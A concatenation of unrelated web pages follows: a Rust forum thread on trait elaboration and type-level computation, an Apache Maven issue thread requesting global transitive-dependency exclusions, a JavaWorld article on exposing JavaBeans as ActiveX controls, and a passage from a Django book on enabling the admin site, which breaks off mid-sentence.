I think that the encouragements to look at Homotopy Type Theory (HoTT) are well-meaning but rather off-topic. What you are looking for for associated types is type-level computation, in a form that has been formalized in various ways in programming language theory (for example, ML module system research uses singleton types to compute with type definitions) and is essentially unrelated to the higher-dimensional nature of HoTT. Equality in general is a deep problem in type theory, and HoTT has a lot of exposure right now, so it is natural for people to think of a relation, but I don't think there is any here. (In technical terms, F-omega already has a type-equality relation in its type system that does type-level computation, while it doesn't have any notion of propositional equality.)

On the other hand, my comment on reading the blog post was that there was a bit too much Prolog and a bit too little type theory, in the following sense: you are not only solving a proof search problem, you are building a program fragment that has computational meaning -- the execution behavior of your program depends on the fragment that is inferred during trait elaboration.

By elaboration, I am referring to the idea of transforming the source code that people write into a more explicit form in which the calls to trait-bound functions are replaced/enriched/annotated with the path of the specific implementation of the function that is actually going to run, and calls to methods with trait assumptions on their generic parameters are enriched/annotated with an extra argument carrying the specific implementation of the trait for the call's instance. (This does not mean that trait dispatch has to be implemented this way in practice; you can always explain the specialization as inlining and specialization of these extra explicit arguments.)

In particular, while the code before the elaboration does not satisfy the type erasability property (if you erase all information about types, you cannot execute the program anymore), the explicited program after elaboration has a type-erased semantics that is faithful to the language semantics.

Understanding this transformation pass is important because (1) having an intermediate form that permits type erasure is an interesting property of your language (it tells you the minimum information a programmer needs to understand to accurately predict program execution) and (2) this intermediate form is a good way to think about human-program interactions in an IDE: it is precisely what you want to show (under some nice syntax) when a programmer wonders "what is going to happen with this trait-bound call here?", and understanding the syntax of these elaborated forms also helps you write better error messages when elaboration fails (because there is an ambiguity, for example).

If you are lucky, you can design this elaboration in such a way that the post-elaboration programs are expressed in exactly the same syntax as the pre-elaboration programs that users wrote. This property trivially holds of Scala's implicit parameters (an implicit parameter is just a value/term that the user could have written themselves), but it is a bit less obvious for Haskell's type classes or Rust's traits.

Using the Haskell syntax that I am more familiar with, you could elaborate something like:

class Eq a where
  eq :: a -> a -> Bool

instance Eq Int where
  eq n1 n2 = ...

instance Eq a => Eq (List a) where
  eq [] [] = True
  eq (x:xs) (y:ys) = eq x y && eq xs ys
  eq _ _ = False

discr :: Eq a => a -> a -> Int
discr x y = if eq x y then 1 else 0

assert (discr [1] [2] == 0)

into the more explicit transformed program

type eq a = (a -> a -> Bool)

eqInt :: eq Int
eqInt = ...

eqList :: eq a -> eq (List a)
eqList eqA [] [] = True
eqList eqA (x:xs) (y:ys) = eqA x y && eqList eqA xs ys
eqList eqA _ _ = False

discr :: eq a -> a -> a -> Int
discr eqA x y = if eqA x y then 1 else 0

assert (discr (eqList eqInt) [1] [2] == 0)

Notice that:

- a class/trait becomes the type of a value returning its operation(s): the class Eq a becomes the type eq a of comparison functions
- a ground instance (Int is in the class Eq) is turned into a value of that type, eq Int
- a conditional instance (if a is in the class Eq, so are lists of a) becomes a function from values of type eq a to values of type eq (List a)
- the call discr [1] [2] in the source version has a behavior that depends on "which definition of the equality will be chosen". In the explicit version, we can easily describe which definition has been chosen by a source term: (eqList eqInt). I could show this to the user; if there was a conflict with two possible definitions, I could show both sides to explain the conflict.

The Prolog rules presented in the blog post explain whether there exists a solution to this elaboration problem, but not what the solution is. There are two ways to describe the relation between these two questions - as proof search over a logic, or as term search in the type system - and neither of these two views is intrinsically better than the other: they are both perfectly correct, and it is interesting to keep both perspectives in mind. Which one matters depends on the specific problem you are asking about the system you are studying. (I think this is important to point out because the original blog post is not balanced in this respect; it only presents the logic-programming view of the problem.)

Here are some reasons why I think also working out the type-theoretic view (that elaboration witnesses are terms that we are doing a search for) is important:

- If you see trait search as elaboration into an existing logic, you will be able to apply existing proof search techniques exactly unchanged, but every desirable property of your design will have to be checked through the encoding from types to logic propositions, and from logic proof terms to programs or elaboration witnesses.
- If you see trait search as term search in your existing type system, you will have to re-interpret existing proof search methods inside a slightly different setting, but the terms and the types manipulated will be those that users know and think about.

You need to combine both views to productively think about the problem.

Heh, I'm glad you think so, because to be honest I know absolutely nothing about homotopy type theory and I don't relish reading into another big area of work.

Yes, so -- to start, I agree with everything you wrote, for the most part. =) I started out taking the "logic-centric" view that you described, where the proof tree defines the program semantics. But I've since shifted gears into a different approach. The key is that, in Rust, every (monomorphized) function definition has a unique type. This is true of closures (of course), but also of function items. These types are zero-sized, but they can be "reified" into a function pointer. You can see that in the following program:

use std::mem;

fn foo() { }

fn main() {
    let f = foo;
    println!("{}", mem::size_of_val(&f)); // prints 0
}

The only time that trait resolution affects program semantics is basically when it decides what code will execute. For example, when I call x.clone(), we will take the (monomorphized) type of x (let's call it X) and then find the appropriate version of clone for X. In my view, this is just associated type normalization.

In other words, you can view the impl of Clone as supplying a (special) associated type clone which is guaranteed to point to one of these unique function types after normalization (this could be modeled as a normal associated type with a further bound, if you cared to do so). My point is that "resolving" x.clone() to a specific bit of code, in this view, is basically equivalent to normalizing the associated type <X as Clone>::clone (where X is the type of x).

So let's say there is a normalization predicate: <X as Clone>::clone ==> T (as, indeed, there is). In this case, it doesn't matter what the proof tree is; if I can prove the normalization judgement, then because I know that T will be some unique function type, I have figured out what code to call -- I just have to reify T into a function pointer. Of course, all of this relies on coherence to ensure that, indeed, every normalization has a specific and unique outcome.

(For trait objects, the way I view it is that there is an (implicit) impl of Trait for the type Trait. That implementation is fixed to extract a pointer out of a vtable and call it.)

What this means for the proof search is that we don't mind if there are multiple proof trees, so long as they all prove the same judgement (i.e., they all normalize <X as Clone>::clone to the same type T).

But we have to be very careful for those cases where we infer some parts of the judgement from others. As an example, if you have only impl Foo for i32, and you ask us to prove ?T: Foo, we will infer that (a) it is true and (b) ?T = i32 must hold. It would be bad if we did that even in the case where there existed more impls, since then we'd be arbitrarily deciding on a semantics for you. But in any case this process of inferring bits of the judgement is exactly the elaboration you were talking about, I believe.

Does that make sense to you?

So Rust's traits have always felt less type-theoretic to me too. I think a big reason is that in Haskell dictionaries often do get passed around, so the proof tree does matter computationally even if coherence guarantees that the evaluated value is unique. Now, I'd like to really be able to explicitly work with vtables and existential types in Rust someday, but until then, yes, the approaches here will work. BTW, the conversation for is very interesting and somewhat tangentially relevant, and I do recommend it.

@nikomatsakis [hope this isn't veering off-topic too much.] The function types approach does work, but IMO it ultimately doesn't feel completely satisfactory, because working with singleton-type proxies alone is quite indirect. Thinking about what would happen if every function singleton type inhabited a trait like

trait Fn<'a, Params, Ret> where Self::Size = 0 {
    const ptr: &'a TrueFn<Params, Ret>;
}

Where 'a would always be 'static today, and TrueFn is a custom Meta = () unsized type. One thing I like about this is that it puts tupled parameter types "at the root", which I think is good for any future variadics work.

Not sure what to do for unsafety and ABI, but heavy solutions do exist (e.g. Haskell's data promotion for an ABI enum).

> So Rust's traits have always felt less type-theoretic to me too

Actually, logic programming can be very type-theoretic. Twelf is a great example: in this language, propositions are literally types and programming is specifying types. See Introduction to Twelf and the Twelf wiki for more details.

After further reflection (and a lot of experimentation) on Rust's trait system, I believe its logic ends up being very similar to that made possible by Scala's Path Dependent Types, and that there are enough similarities that it would be worth reviewing as some very relevant prior art.
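A small standalone sketch of the "reify into a function pointer" step @nikomatsakis describes above (plain Rust; nothing here is specific to the trait-solver work itself):

fn foo() {}

fn main() {
    // `f` has the zero-sized, unique type of the `foo` function item...
    let f = foo;
    assert_eq!(std::mem::size_of_val(&f), 0);

    // ...and can be reified into an ordinary function pointer. This is
    // what normalizing `<X as Clone>::clone` to a unique function type
    // and then "reifying T" would bottom out as.
    let p: fn() = f;
    p();
}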
https://internals.rust-lang.org/t/blog-series-lowering-rust-traits-to-logic/4673
Details
- Type: New Feature
- Status: Reopened
- Priority: Major
- Resolution: Unresolved
- Affects Version/s: None
- Fix Version/s: needing-scrub-3.4.0-fallout
- Labels: None

Description

I depend on some libraries, which in turn depend on something (which in turn depends on something) that I don't want, because I declare some other artifact in my pom.xml. A concrete example: I don't want the artifact "xerces" to be imported into my project, because I declare a dependency on "xercesImpl", which ships newer libraries but with the same namespaces. I guess I would need an "exclude transitive dependency entirely" feature, either globally or from this and that artifact. I saw the <exclusions> tag, but it forces me to be very verbose and to have exact control over what is required by each dependency.

Activity

Adding another possibly useful way to configure this:
- disable all transitive deps for certain scopes (e.g.: I'd like transitive deps marked for 'runtime' and 'compile', but not for 'test')

The squeakiest tire gets the oil first: that would indeed be a much wanted feature. Gilles Tabary

Hi! The main issue is that it can't be specified in the current pom model (4.0.0), and updates to the pom model require the next version, aka 2.1. There is a way to detect these creeping in, in dependency:analyze-dep-mgt, and in the next enforcer release there will be a rule that can fail the build when any excluded dependencies are found in the build.

I don't know, I will miss all of the late nights and long weekends I spend analyzing the dependency tree trying to get rid of one stupid JAR file that causes the application not to run properly. What will I do with all my extra time? Wow, maybe I can actually DEVELOP something.

I can just agree with the others here; this is indeed a VERY important feature. It would ease development a lot. As it is, if you have such a bogus dependency, you have to copy and paste every possible exclusion to every dependency. This is really ugly and costs a lot of time.

I'm currently also suffering from the lack of this feature and would be extremely grateful to see this one added. Cheers, C

It seems to me that the original problem would be solved better by artifact substitution or aliasing rather than more exclusions, e.g. if you want to use something reasonable such as slf4j to imitate commons-logging usage, you want to replace any dependency on commons-logging with one on jcl-over-slf4j. Similarly, you might want to swap spec implementations - say, to use the Geronimo ones no matter which copies the original projects were built against, or to use Geronimo's activation implementation instead of Sun's. This isn't quite the same as what OSGi gives you, but it is quite powerful.

You are right David, that would solve the original problem in an elegant way. Is this an existing feature I missed, or should we submit a new JIRA issue for this?

Aliasing would be nice. But I would also like to be able to specify that, for example, junit-3.8.1 should NEVER be downloaded and never be resolved as a dependency for my projects. I don't ever want junit-3.8.1 and junit-4.5 to both be in the same classpath.

This just became a total showstopper with SpringSource effectively cloning the entire Maven dependency set in their "enterprise" repo. I know that's not Maven's fault, but both global exclusions (e.g.
as protections against known bad poms) and aliasing (to always substitute slf4j for clogging) would really fix a lot of problems that this has caused.

That's a lovely development. If you use Nexus, you can control which artifacts come from a given repo, so you can prevent the SpringSource repo from polluting your team. There's nothing that can be done inside Maven for global exclusions until 3.0, since it requires a model change in the pom.

It's a sad thing that this will never be available for backports because the pom model cannot be changed.

Pierre, the pom format can't be changed until Maven 3.x. The alphas of 3.x are close by, but currently the focus is on 2.x compatibility with the new code, and a process to handle pom model changes hasn't been built yet.

Could this not be achieved via a new scope? I'm thinking:

<dependency>
  <groupId>commons-logging</groupId>
  <artifactId>commons-logging</artifactId>
  <version>1.1.1</version>
  <scope>excluded</scope>
</dependency>

The semantics would be that any artifactId declared in this way would be guaranteed not to be on either the test or main runtime or compile-time classpath, and neither would any of its transitive dependencies, and its transitive dependencies would not be added to the declaring pom's transitive dependencies, regardless of version number or where in the transitive dependency tree they occurred. (This is effectively how people are achieving the desired effect already, by using scope "provided" - but that has the negative that the artifact and all of its transitive dependencies are still on the compile classpath, raising the possibility of errors only discovered at runtime.)

Hi Robert, you are right to observe that the provided scope has the inconvenience of placing the thus-"excluded" artifact on the project's classpath within the IDE, in particular Eclipse. However, as far as I know, the artifact is effectively excluded during build time by Maven. The provided scope is unsatisfactory during development time within the IDE, i.e. within Eclipse or IDEA.

Maven definitely makes provided-scope dependencies available at compile time - otherwise no library compiled against the servlet API would compile. A good example in the logging context would be someone who desired to use slf4j-over-log4j instead of log4j. Making log4j itself have scope provided would have the desired runtime behaviour of excluding the log4j jar if any transitive dependency brought it in, thereby preventing any non-determinate behaviour depending on which version of the log4j classes the classloader loaded first; however, at compile time Maven would happily be able to compile code dependent on classes that are included in log4j but are not in slf4j-over-log4j, and the user would only discover the problem at runtime.

D'oh! Thanks for the explanation.

Hello, I gave a go at this new feature following Rob Elliot's idea of using a <scope>excluded</scope>, and it works a treat for me. I uploaded the Maven changes + integration test as patches. Thanks, Jean-Noel

Hi, I didn't review your patch, thus I won't judge it. I really dislike this idea of continuing to play with the lack of control in old Maven versions, which will ignore things they don't know in the POM. For me, such a change must be done only in a new POM version and with all the mechanisms needed to be usable with previous and future Maven versions. Did you test such a POM with Maven 3.0.x? I think it at least displays a warning if there is a scope it doesn't know (I don't remember, but perhaps it breaks the build).
And when a Maven version ignores it, what does it do? It uses the compile scope? #fail - in that case, instead of excluding it, you explicitly add it (transitively). Cheers

Hello, BTW the <scope>excluded</scope> solution doesn't really help in any way to deal easily with excludes. It looks like a hard-wired work-around. Adding a <transitive>true|false</transitive> or a <handling>transitive|simple</handling> (maybe better, to allow further unforeseen improvements), either at the level of all <dependencies></dependencies> or at the level of a single <dependency></dependency>, wouldn't be hard to deal with (just a test to trigger the transitive search of the underlying tree) and would achieve the expected result. I thought that the pom model was supposed to evolve from version 3.0.x on? Regards, Pierre-Antoine.

@Arnaud Sorry, I went for the easiest to implement. If you do not like it this way, fair enough, we can do it otherwise. I originally started with such a change to the pom.xml:

<project>
  <dependencies>
    <exclusions>
      <exclusion>
        <groupId>com.mycompany</groupId>
        <artifactId>myproject</artifactId>
        <classifier>optional</classifier>
      </exclusion>
    </exclusions>
    <dependency>
      ...
    </dependency>
    ...
  </dependencies>
  ...
</project>

No, I did not test with older versions of Maven. I saw that maven-3 has got some validation mechanism for the scope, so I think it would reject it. For maven-2 I need to check. Indeed, the following scenario would be catastrophic: "And when a maven version ignores it, what does it do ? It uses the compile scope ? #fail in that case, instead of excluding it, you explicitely add it (transitively)". I will test both of these and let you know. Also, it does not really matter to me which mechanism you prefer to use. Just tell me how you want it to look in the pom.xml and I can have a look at doing it. Jean-Noel

Hi Arnaud, you were right: using <scope>excluded</scope> with older versions of Maven (I used v2.2.1) gives the opposite result to what is intended. The excluded scope is ignored and replaced with a compile scope. How do you want to proceed now? I suppose we now need to do a pom.xml format change. If I understood correctly, this is scheduled for Maven 3.1. Do you want to go for the solution I suggested in my last comment? Or do you want to do it differently? Please let me know your suggestions and I will try to implement it. Thanks, Jean-Noël

Might be that this is already commented, but here's what we need:
- The possibility to exclude transitive dependencies using groupId only (meaning all artifacts/versions within that groupId).
- Another nice feature would be a global pom setting that says: "Use transitive dependencies during compile, but not during packaging". Meaning: you can quickly get up and running while developing code (getting all dependencies needed), but when bundling e.g. a war file, transitive dependencies are excluded because you want to control the war content.
- Also a nice feature would be to turn off transitive dependencies altogether.

I think there's some allusion to a version 5 of pom.xml, which would be interesting. If nothing else, I certainly support the idea of <scope>exclude</scope>. It is time that we got a release that solved some of the longest-standing issues and gave us an opportunity to move forwards, rather than living with backwards compatibility that kills us.

I love the idea of allowing a switch to change "compile -> compile = compile" to what was originally intended, that "compile -> compile = runtime". This would make many builds far more robust to changes in child dependencies.
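(For context on the verbosity complained about throughout this thread: with the POM model as it stands, keeping one unwanted transitive artifact out means repeating an exclusion block under every dependency that drags it in. A sketch with placeholder coordinates - only the commons-logging exclusion itself reflects standard practice here:)

<dependencies>
  <dependency>
    <groupId>com.example</groupId>
    <artifactId>library-a</artifactId>
    <version>1.0</version>
    <exclusions>
      <exclusion>
        <groupId>commons-logging</groupId>
        <artifactId>commons-logging</artifactId>
      </exclusion>
    </exclusions>
  </dependency>
  <dependency>
    <groupId>com.example</groupId>
    <artifactId>library-b</artifactId>
    <version>2.0</version>
    <!-- ...and the same exclusion block again, once per dependency -->
    <exclusions>
      <exclusion>
        <groupId>commons-logging</groupId>
        <artifactId>commons-logging</artifactId>
      </exclusion>
    </exclusions>
  </dependency>
</dependencies>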
@Morten: I think that "include transitive dependencies during packaging" should rather be a feature of the war, shade and other packaging plugins. There must already be enough information available to plugins through project meta-data, because maven-assembly-plugin already has an option to filter out transitive dependencies.

@Neale: I agree that it would make a lot of sense to promote transitive compile dependencies into runtime scope, but unfortunately that does not solve the problem of polluting the runtime scope with unwanted transitive dependencies. A more flexible exclusion mechanism using patterns or some other configuration is still needed.

> compile -> compile = runtime
> This would make many builds far more robust to changes in child dependencies.

You can simulate this if you use a global master pom. Then you would not only set the version in the depMgmt, but also the scope of all deps to runtime. That will have the same effect; you would have to set compile scope explicitly everywhere in your project. Been there and reverted it... you'll see yourself, if you try.

Thanks for the feedback, guys. My use case is as simple as this: I want to exclude some transitive dependencies across all dependencies to allow compiling GWT code. Otherwise I get the error "the input line is too long" on Windows. So far we have to exclude the same transitive dependencies for all the dependencies where they exist, which can be as many as 8 today. Not nice :-/, hence why I am looking at this solution. A simple global exclude would solve the problem for us. It looks to me like the code I wrote is good enough to handle my use case. I just need to know how the Maven team wants this configuration to look in the pom.xml file and then I can look at doing it.

Hello, I gave another go at this issue. This time, I specified the exclusions in the pom.xml file by following this approach:

<project>
  <dependencies>
    ...
  </dependencies>
  ...
  <exclusions>
    <exclusion>
      <groupId>com.mycompany</groupId>
      <artifactId>myproject</artifactId>
    </exclusion>
  </exclusions>
  ...
</project>

Please let me know what you think of these patches. Thanks, Jean-Noel

+1 to this, though I'm not sure if Maven is still being actively developed?

JvZ - why not Maven 3.1 for this? It's highly voted and there's a patch, yet no comment on the patch has been made. That's not good for goodwill.

A real-world problem needs a solution. Is there any real intention to address this?

8 years, 155 votes, 5 duplicates and 4 patches later, I wonder: should I be proud or embarrassed that the issue is still unresolved?

I just lost 2 days peppering my poms with individual exclusions. Can we please have this feature? It has always been a problem for anyone who hates commons-logging.

Really, this is a MUST-HAVE. When using log4j2 there is a Jakarta Commons Logging Bridge that has the full commons-logging.jar as a dependency. That means the global exclusion needs to make sure that I can exclude all transitive deps on "commons-logging", except for the log4j-jcl.jar. Maybe like this:

<project>
  <exclusions>
    <exclusion>
      <groupId>commons-logging</groupId>
      <artifactId>commons-logging</artifactId>
    </exclusion>
  </exclusions>
</project>

and for the log4j-jcl dependency:

<dependency>
  <groupId>org.apache.logging.log4j</groupId>
  <artifactId>log4j-jcl</artifactId>
  <version>${log4j2.version}</version>
  <inclusions>
    <!-- ... -->
  </inclusions>
</dependency>

Starting with Maven 3.2.1 there is a simple solution which excludes all transitive dependencies:

<dependencies>
  <dependency>
    <groupId>org.apache.maven</groupId>
    <artifactId>maven-embedder</artifactId>
    <version>3.1.0</version>
    <exclusions>
      <exclusion>
        <groupId>*</groupId>
        <artifactId>*</artifactId>
      </exclusion>
    </exclusions>
  </dependency>
  ...
</dependencies>

maven-embedder - is its aim to embed Maven? Where can I find more details about this plugin? There's too little info here.

Starting with Maven 3.4, you can manage dependencies to optional in dependency management. That is the same as excluding them globally when they are not explicitly declared as a direct dependency. This has been reverted for 3.4 and got postponed for 3.5.

Looking at the original ask, the correct solution is, rather than global exclusions, the ability to say "X supplies Y", as in something along the lines of either MNG-177 or MNG-5652. IMHO a global exclude both complicates things for users and acts as a siren's call... applying exclusions is really an indication that somebody has done something wrong. We should not remove the ability to apply one-off per-dependency fix-ups... individual projects can and will make mistakes from time to time... but a global exclusion, to my mind, indicates that the project that declares the global exclusion has made a mistake... they should just fix the mistake, rather than continue to propagate it further.

Not targeted for 3.5.0.

Also, people are actually deploying high-availability Maven repositories containing only "99-version-does-not-exist" versions of empty artifacts, just to get around this problem. This shows how badly this is needed.

From MNG-2031: Transitive dependencies are cool; however, the limitations are very difficult to work around. One cool feature would be to allow disabling transitive dependencies in the following ways: […]
https://issues.apache.org/jira/browse/MNG-1977
Life's tough when you're trying to develop reusable software components. Often, the development tools your customers use dictate which development tools and architecture you choose. As a component developer, you may be attracted to the simple, object-oriented architecture of JavaBeans. However, there are a lot of Visual Basic (Visual C++, Delphi, etc.) developers who want ActiveX controls, not JavaBeans. Are you ready to forfeit these potential customers? Wouldn't it be great if you could write your components in Java and make them available to ActiveX control users? Well, you can. And in many cases, you won't even have to modify your existing Java code!

The right tool for the job: choosing between the Sun and Microsoft tools

Sun's JavaBeans Bridge for ActiveX 1.0

The first tool we'll examine is the Packager application, which comes as part of Sun's JavaBeans Bridge for ActiveX. Packager allows you to:

- Generate Windows-friendly event interfaces
- Generate standard, easy-to-use registry files
- Require separate jar files for ActiveX users

To see what "Windows-friendly event interfaces" means in practice, consider a custom event class like this one:

public class GameEvent extends java.util.EventObject {
    public GameEvent(Object source, int level, int numClicks, boolean won) {...}
}

If you don't select the uncrack option, a Visual Basic event handler method might look something like this:

Private Sub Blackout1_mouseClicked(ByVal GameEvent1 As Object)
    ' Get the number of clicks from the event
    ' using the IDispatch interface
    Clicks.Caption = GameEvent1.getNumClicks
End Sub

Notice that the method receives the GameEvent instance as a generic Visual Basic Object type. Because Visual Basic supports late binding, the GameEvent.getNumClicks method can be invoked on the generic object. Behind the scenes, this call is passed to the Java object. (More on how this works later.) However, Visual Basic's name-completion capabilities will be unavailable to the user, and invocation errors won't be detected until runtime.

Event handlers for uncracked events receive the event as a list of its component parts. Here's a handler, which has been uncracked, for the same event:

Private Sub Blackout1_mouseClicked(ByVal numClicks As Long, ByVal Level As Long, ByVal won As Boolean, ByVal source As Object)
    Clicks.Caption = numClicks
End Sub

Uncracking your events has two ramifications. First, because the event object is no longer passed into the event handler, any custom methods you've added to your event will be unavailable. Second, because the event handler receives copies of the data in the event, it presumes that your event's fields are immutable.

After you select all the generation parameters, click on the Start Generation button to put Packager to work. Packager first generates adapter classes and adds them to your jar file. At this point, your jar can only be used in an environment where the Sun ActiveX bridge classes (in the sun.beans.ole package) are available. If you want to distribute your JavaBeans to environments that will not have these classes, you'll need to ship a copy of the jar file that hasn't been run through the Packager.

Next, Packager generates type library (tlb) and registry (reg) files for the JavaBean. The registry file contains information about the ActiveX control, including the location of its type library and jar files. This file is loaded into the registry so that ActiveX client applications can access the control. Users of your controls can include the registry file with their applications and/or incorporate its contents in their application installation scripts.
The type library contains information about the COM (more on COM later) interface(s) supported by the control. Applications use this file to provide API information to the control user. Packager preserves your Java method parameter names, making the controls easier to use (Microsoft's javareg names parameters Parameter0, Parameter1, et cetera). Although this file is binary, you can examine its contents with the OLE-COM Object Viewer that comes with Visual C++. You'll notice that this file looks a lot like any other type library. There's really nothing Java-specific about it.

Users of your control won't necessarily know they're using a JavaBean. It will appear along with the other ActiveX controls and have almost all the same characteristics found in controls written in other languages like Visual C++. It will, however, have one nifty addition: if you've gone to the trouble to write a customizer for your JavaBean, it will be available as a custom property page in ActiveX environments.

When a JavaBean/ActiveX control is loaded into a development tool or application, the registry information instructs the system to load the Java virtual machine as a dynamically-linked library (assuming it hasn't already been loaded) and create an instance of your JavaBean class. Subsequent method calls and events are passed between the application and the control via the adapter classes generated by the Packager.

When deployed, JavaBeans that have been bridged with the Packager will require the following items to be installed on your customer's machine:

- The Java Development Kit (JDK) or Java Runtime Environment (JRE), version 1.1 or higher
- The JavaBeans Bridge for ActiveX or JavaBeans Bridge for ActiveX Runtime
- The jar file you ran through the Packager
- The registry and type library files that were generated by the Packager

Note that the registry file contains some explicit directory information. You may need to modify the values to match the installation directories used on the customer's machine. Do this before the file is loaded into the registry.

Microsoft's Software Developer's Kit (SDK) for Java 3.0

Next we'll examine Microsoft's tool, javareg. Although javareg performs the same task as Sun's Packager, its approach is somewhat different. The javareg tool allows you to:

- Register most Java classes as COM objects
- Support low-level COM/DCOM as well as ActiveX
- Require a special registration tool to be shipped with your controls

We'll examine each of these capabilities in detail in the following discussion.

javareg comes as part of Microsoft's SDK for Java. In addition to registering JavaBeans as ActiveX controls, it provides two capabilities currently unavailable from Sun's tools. First, it allows Java classes to be registered as standard COM/DCOM objects, as well as ActiveX controls. Second, it can register almost any Java class, regardless of whether or not it's a JavaBean. This supports low-level COM integration and also facilitates the implementation of user-defined types as JavaBean method parameters and return types. In addition, the Microsoft SDK includes a package (com.ms.com) of classes that provide enhanced COM capabilities, including the ability to use COM objects written in other languages within Java code. If you're looking to integrate closely with COM, these capabilities will probably compel you to use javareg and the other tools in the SDK. This article, however, will focus on ActiveX control registration and leave the low-level COM discussion for another time.
Prior to using javareg, you should make sure that your JavaBean classes are accessible within the classpath. Next, you invoke javareg from the command line, with parameters that specify how your JavaBean is to be registered:

javareg /register /control /codebase:. /class:blackout.Blackout /clsid:{3BFE1750-0C76-11d2-B0FA-00A024BA2CD9} /typelib:Blackout.tlb

In this example, the command-line arguments indicate that we're registering an ActiveX control from the blackout.Blackout Java class, and that the files can be located in the current directory. The CLSID parameter specifies a globally unique identifier (GUID) for the ActiveX control being registered. Most applications use the CLSID (rather than the name) to retrieve information about an ActiveX control. For this reason, control developers rarely change a control's CLSID. Providing the CLSID parameter allows you to ensure the same value is used any time the control is registered. If you don't specify the CLSID on the command line, javareg will create a new CLSID for the JavaBean. (Note: You can have explicit control of the CLSID with Sun's tools by editing the CLSID entry of the reg file generated by the Packager.)

Unlike the Sun tool, javareg doesn't generate adapter classes to implement bridging. Instead, Microsoft built the bridging smarts directly into its Java virtual machine. This eliminates the need to maintain a separate jar file for ActiveX installations.

The javareg tool also bypasses generation of a registry file by directly updating the registry. This is unfortunate, as it limits your access to the information being inserted into the registry. For example, while javareg does allow you to set the CLSID for your control, there are other registry identifiers, including one for the type library, that it generates every time it's run. Because Visual Basic applications use the type library identifier, the Visual Basic developer must repair applications that use a bridged control each time it is re-registered, even though the control itself may not have changed. In addition, customers of your controls will also need to incorporate javareg in the installation scripts for their applications. The good news is that many of the registry entries are boilerplate, so with a little effort you can solve these problems by generating your own reg file. However, it would be much nicer if the tool did this for you!

The javareg tool does, however, generate a type library. If you examine this file and the one generated by the Sun tool, you'll find the two are nearly identical. Inside the type library you'll find declarations for the public interface of your JavaBean, as well as the interface for objects that will receive events generated by your JavaBean. Both javareg and Sun's Packager will generate this information from your BeanInfo class if you created one for your JavaBean. Otherwise, introspection is used to generate the type library information.

Although javareg differs from Sun's Packager in the way it bridges your JavaBeans, usage of the controls is the same. The controls appear as normal ActiveX controls. When they're loaded into an application, the Microsoft Java VM is also loaded and an instance of the JavaBean is created.
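Since both tools read BeanInfo metadata when present, here is a minimal sketch of what such a class can look like. It uses the standard java.beans API, but the "level" property is illustrative and assumes a Blackout bean with matching get/set accessors - it is not taken from the article's actual Blackout source:

import java.beans.IntrospectionException;
import java.beans.PropertyDescriptor;
import java.beans.SimpleBeanInfo;

// Minimal BeanInfo sketch: exposes a single "level" property so the
// bridging tools can emit friendlier type library information.
public class BlackoutBeanInfo extends SimpleBeanInfo {
    public PropertyDescriptor[] getPropertyDescriptors() {
        try {
            // assumes Blackout has getLevel()/setLevel(...) accessors
            return new PropertyDescriptor[] {
                new PropertyDescriptor("level", Blackout.class)
            };
        } catch (IntrospectionException e) {
            return null; // null tells tools to fall back to introspection
        }
    }
}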
When deployed, JavaBeans that have been bridged with javareg will require the following items to be installed on your customer's machine:

- A recent version of the Microsoft Java virtual machine (msjava.dll)
- The javareg.exe program from the Microsoft Java SDK
- Your JavaBean and its supporting files

javareg will need to be run on the target machine. You may want to ship registration scripts and the type libraries, to ensure that controls are generated identically for all customers.
http://www.javaworld.com/article/2076750/client-side-java/master-of-disguises--making-javabeans-look-like-activex-controls.html
For a certain class of Web sites, an admin interface is an essential part of the infrastructure. This is a Web-based interface, limited to trusted site administrators, that enables the adding, editing and deletion of site content. Some common examples: the interface you use to post to your blog, the backend site managers use to moderate user-generated comments, the tool your clients use to update the press releases on the Web site you built for them. Django's automatic admin interface addresses this need: it works by reading metadata in your model to provide a powerful and production-ready interface that site administrators can start using immediately. Here, we discuss how to activate, use, and customize this feature.

Note that we recommend reading this chapter even if you don't intend to use the Django admin site, because we introduce a few concepts that apply to all of Django, regardless of admin-site usage.

Django's automatic admin is part of a larger suite of Django functionality called django.contrib – the part of the Django codebase that contains various useful add-ons to the core framework. You can think of django.contrib as Django's equivalent of the Python standard library – optional, de facto implementations of common patterns. They're bundled with Django so that you don't have to reinvent the wheel in your own applications.

The admin site is the first part of django.contrib that we're covering in this book; technically, it's called django.contrib.admin. Other available features in django.contrib include a user authentication system (django.contrib.auth), support for anonymous sessions (django.contrib.sessions) and even a system for user comments (django.contrib.comments). You'll get to know the various django.contrib features as you become a Django expert, and we'll spend some more time discussing them in Chapter 16. For now, just know that Django ships with many nice add-ons, and django.contrib is generally where they live.

The Django admin site is entirely optional, because only certain types of sites need this functionality. That means you'll need to take a few steps to activate it in your project.

First, make a few changes to your settings file:

- Add 'django.contrib.admin' to the INSTALLED_APPS setting.
- Make sure INSTALLED_APPS also contains 'django.contrib.auth', 'django.contrib.contenttypes' and 'django.contrib.sessions'; the Django admin site requires these packages.
- Make sure MIDDLEWARE_CLASSES contains 'django.middleware.common.CommonMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware' and 'django.contrib.auth.middleware.AuthenticationMiddleware'.

Second, run python manage.py syncdb. This step will install the extra database tables that the admin interface uses. The first time you run syncdb with 'django.contrib.auth' in INSTALLED_APPS, you'll be asked about creating a superuser. If you don't do this, you'll need to run python manage.py createsuperuser separately to create an admin user account; otherwise, you won't be able to log in to the admin site. (Potential gotcha: the python manage.py createsuperuser command is only available if 'django.contrib.auth' is in your INSTALLED_APPS.)

Third, add the admin site to your URLconf (in urls.py, remember). By default, the urls.py generated by django-admin.py startproject contains commented-out code for the Django admin, and all you have to do is uncomment it. For the record, here are the bits you need to make sure are in there:
Nevertheless, we’ll give you a quick walkthrough of the basic features. The first thing you’ll see is a login screen, as shown in Figure 6-1. Figure 6-1. Django’s login screen Log in with the username and password you set up when you added your superuser. If you’re unable to log in, make sure you’ve actually created a superuser – try running python manage.py createsuperuser. Once you’re logged in, the first thing you’ll see will be the admin home page. This page lists all the available types of data that can be edited on the admin site. At this point, because we haven’t activated any of our own models yet, the list is sparse: it includes only Groups and Users, which are the two default admin-editable models. Figure 6-2. The Django admin home page Each type of data in the Django admin site has a change list and an edit form. Change lists show you all the available objects in the database, and edit forms let you add, change or delete particular records in your database. Other languages If your primary language is not English and your Web browser is configured to prefer a language other than English, you can make a quick change to see whether the Django admin site has been translated into your language. Just add 'django.middleware.locale.LocaleMiddleware' to your MIDDLEWARE_CLASSES setting, making sure it appears after 'django.contrib.sessions.middleware.SessionMiddleware'. When you’ve done that, reload the admin index page. If a translation for your language is available, then the various parts of the interface – from the “Change password” and “Log out” links at the top of the page, to the “Groups” and “Users” links in the middle – will appear in 